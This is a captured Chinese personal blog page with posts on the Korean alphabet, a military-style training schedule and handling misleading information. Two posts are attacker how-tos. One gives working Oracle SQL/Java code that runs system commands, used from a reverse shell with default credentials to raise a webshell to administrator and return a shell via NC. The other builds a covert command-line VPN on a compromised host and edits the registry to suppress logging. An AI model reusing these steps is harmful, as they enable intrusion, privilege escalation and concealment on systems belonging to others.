Windows LiveWindows Live
 
 
wen's profile天使禁猎区-音乐、情感、文字、网络PhotosBlogLists Tools Help

Blog
    July 24

    韩语字母40音

    其实韩语字母(Hangul)的概念就有点像这两种拼音方法的
    韩语字母有分开成「자음」(子音)和「모음」(母音)两种

    子音,就像汉语拼音里的「声母(Shengmu)」或英语音标的「辅音(Consonants)」
    不能独立发声,需要后接一个母音才能发声。
    按韩语顺序的子音为:
    (松音)ㄱㄴㄷㄹㅁㅂㅅㅇㅈ
    (激音)ㅊㅋㅌㅍㅎ
    (浓音)ㄲㄸㅃㅆㅉ
    把这些子音罗马化后:
    (松音)g/k n d/t r/l m b/p s - j
    (激音)ch' k' t' p' h
    (浓音)gg dd bb ss jj

    母音,就像汉语拼音里的「韵母(Yunmu)」或英语音标的「元音(Vowels)」
    每个均能独音发声,在其前后均可拼音子音。
    按韩语顺序的母音为:
    (基本字母)ㅏㅑㅓㅕㅗㅛㅜㅠㅡㅣ
    (复合字母)ㅐㅒㅔㅖㅚㅟㅢㅘㅝㅙㅞ
    把这些子音罗马化后:
    (基本字母)a ya eo yeo o yo u yu eu i
    (复合字母)ae yae e ye oe eui wa weo wae we

    所以其实韩语字母是一套相当科学化的表音文字来
    我们所看到的每一个韩语文字,其实均由子音和母音所组成的
    就如「한국」(韩国)一字
    第一个字「한」其实是由「ㅎ+ㅏ+ㄴ」(h+a+n)所组成;
    第二个字「국」其实是由「ㄱ+ㅜ+ㄱ」(g+u+k)所组成
    也就是说单看文字的写法,就已经标示了这个发音的子音和母音
    所以基本上只要记著韩语里基本的子音和母音
    理论上就已经能把所见的任何韩语文字念出来了 
    11:17 PM | Add a comment | Read comments (3) | Permalink | Blog it
    July 10

    用Oracle提升权限

    2007-03-08 05:19

    1.sql 

      

    create or replace and compile
java source named "Util"
as
import java.io.*;
import java.lang.*; 
public class Util extends Object
{
public static int RunThis(String args)
{
Runtime rt = Runtime.getRuntime();
int rc = -1; 
try
{
Process p = rt.exec(args);
int bufSize = 4096;
BufferedInputStream bis =
new BufferedInputStream(p.getInputStream(), bufSize);
int len;
byte buffer[] = new byte[bufSize];
// Echo back what the program spit out
while ((len = bis.read(buffer, 0, bufSize)) != -1)
System.out.write(buffer, 0, len); 
rc = p.waitFor();
}
catch (Exception e)
{
e.printStackTrace();
rc = -1;
}
finally
{
return rc;
}
}
}

    2.sql 

      

    create or replace
function RUN_CMD(p_cmd in varchar2) return number
as
language java
name 'Util.RunThis(java.lang.String) return integer';

    3.sql 

      

    create or replace procedure RC(p_cmd in varchar2)
as
x number;
begin
x := run_cmd(p_cmd);
end;

    保存在c:\下,然后用反连接得到的shell运行 

      

    sqlplus system/manager@xxx

    然后再来执行脚本 

      

    SQL>@C:\1.sql
SQL>@C:\2.sql
SQL>@C:\3.sql

    看到JAVA已创建、函数已创建、过程已创建,接着我们继续 

      

    SQL> variable x number;
SQL> set serveroutput on
SQL> exec dbms_java.set_output(100000);
SQL>grant javasyspriv to system

    看到授权成功。接着我们就可以来执行系统命令了。我想先把ASP.dll加入特权一组 

      

    SQL>exec :x := RUN_CMD('cscript adsutil.vbs set /W3SVC/InProcessIsapiApps 
"c:\winnt\system32\inetsrv\asp.dll" ');

    看到过程已经成功完成,这个时候我们重新登陆我们的webshell,他已经具有admin权限了。接着,再用NC返回一个shell,已经是管理权限的,我们可以做我们想干的事了。因为这个主机有防火墙过滤除80以外的端口,所以不好做图形的后门,只有留下一有权限的webshell。到此已经提权成功。

    4:19 PM | Add a comment | Read comments (1) | Permalink | Blog it | Computers and Internet

    CMD下建立VPN

    CSDN的博客让我很失望……
    好了,下面正题。
     
    CMD下建立VPN
     
    1.前提
    服务里 windows防火墙停止(或者麻烦点可以把router协议,端口1723配进去)
    远程注册表服务必须开启
    server服务必须开启
    router路由服务必须开启

    两块以上网卡的win2000做vpn很方便,添加nat协议后,客户端拨入,能够使用远程网络连接internet。 使得部分客户端可提高网络速度,并达到代理的作用。

    一块网卡的winxp,win2003做类似的vpn仍然很方便,nat协议添加后,再添加两个接口,一个是本地连接,一个是内部,设置本地连接为全转发,内部为私有模式,既可让有权限的用户拨入。

    一块网卡的win2000,做类似的vpn就不方便了,nat协议添加后,再添加接口,只可以添加上本地连接,内部不容许图形界面的添加,察看了netsh dump >c:\1.txt后,尝试在netsh命令添加内部接口,通过。 命令为:netsh routing ip nat add interface 内部 private

    下面是部分常用命令:

    netsh ras set user username permit //设置用户授权,该用户不能为tsinternetuser support_388945a0等。

    netsh ras ip set addrassign pool //设置静态地址池模式

    netsh ras ip add range 10.0.0.1 10.0.0.100 // 设置静态池范围 ,要用标准的局域网地址,避免将来在访问internet时候地址转发错误。

    netsh routing ip nat install //添加nat协议

    netsh routing ip nat add interface 本地连接 full //添加nat接口本地连接全转发

    netsh routing ip nat add interface 内部 private //添加nat借口内部私有模式

    igmp同样可以在netsh配置,命令行很长:

    netsh routing ip igmp install

    netsh routing ip igmp add interface 内部 igmpprototype=IGMPRTRV2 ifenabled=enable robustvar=2 startupquerycount=2 startupqueryinterval=31 genqueryinterval=125 genqueryresptime=10 lastmemquerycount=2 lastmemqueryinterval=1000 accnonrtralertpkts=YES

    netsh routing ip igmp add interface name="本地连接" igmpprototype=IGMPPROXY ifenabled=enable
    如果配置前已经有接口,就要先删除:

    netsh routing ip igmp delete interface 内部 //与此类似

    路由和远程访问服务会在系统、安全日记中记录不少信息,比如ipsec、登陆信息。

    修改一下注册表可以避免:

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasMan\Parameters

    ProhibitIPsec"=dword:00000001

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess\Parameters

    LoggingFlags"=dword:00000000

    现在除了登陆信息,ipsec,remoteaccess警告,已经不记录。

    ----------------------------------------

    还有值得一提的是建立好地vpn,通常使用的都是pptp协议,tcp1723端口,如果我们在网卡的ip策略添加了tcp1723的容许条目,基本上可以拨入。为什么是基本呢,因为pptp除了 tcp1723外还有一个ip47号协议,不同于tcp不同于udp,此协议对于认证很重要。如果网络上的防火墙割断的话,会出现拨号->用户认证 ->不通过认证断开的问题。

    在配置vpn的时候,还需要remoteregister服务的支持,建立好以后可以关掉。

    workstation , server,rpc同样在配置时候需要。

    ----------------------------------------

    经测试,全命令行的建立vpn后,rrasmgmt.msc不出现具体配置信息。也就是说只有看网络连接文件夹,才能看出来一个拨入的连接。貌似隐蔽,比较见鬼
    3:52 PM | Add a comment | Permalink | Blog it | Computers and Internet
    July 05

    今天看到别人的训练强度,感觉一点也不科学......

     
     
    每天的作息时间为:
    6:30 早操
    8:00-9:00 早自修
    9:00-18:00 拉练正式开始
    19:00-20:30 晚自修
    22:30 熄灯休息
     
     
    怎么睡都不够8小时。中间除了午饭,不间断的训到6点才能吃晚饭。。。晚自修不准出去?(什么鸟规定)
     
     
     
     
    5:27 PM | Add a comment | Read comments (1) | Permalink | Blog it
    July 04

    误导和反误导

        在工作中我们通常会接受到很多信息,或者是指导,或者是提示,或者是线索,或者是经验。
        大量的信息开始让你找不到北。我们很容易被误导。
       
     
        这个时候你需要的是:
        1.以你最近队友的提示为优先。
        2.除了逻辑判断也要有直觉判断。
        3.有时候简单的最有效。
        4.冷静。
    9:36 AM | Add a comment | Read comments (2) | Permalink | Blog it